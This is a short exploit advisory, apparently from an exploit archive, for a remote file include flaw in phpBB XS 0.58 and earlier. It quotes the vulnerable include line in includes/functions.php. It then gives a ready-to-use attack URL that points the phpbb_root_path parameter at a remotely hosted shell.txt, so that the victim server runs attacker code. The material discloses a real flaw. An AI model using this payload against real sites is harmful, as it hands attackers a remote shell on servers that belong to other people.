phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
# Published : 2006-09-12
# Author : AzzCoder
# Previous Title : Newsscript <= 0.5 Remote and Local File Include Vulnerability
# Next Title : p4CMS <= 1.05 (abs_pfad) Remote File Include Vulnerability

Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# www.Syue.com [2006-09-12]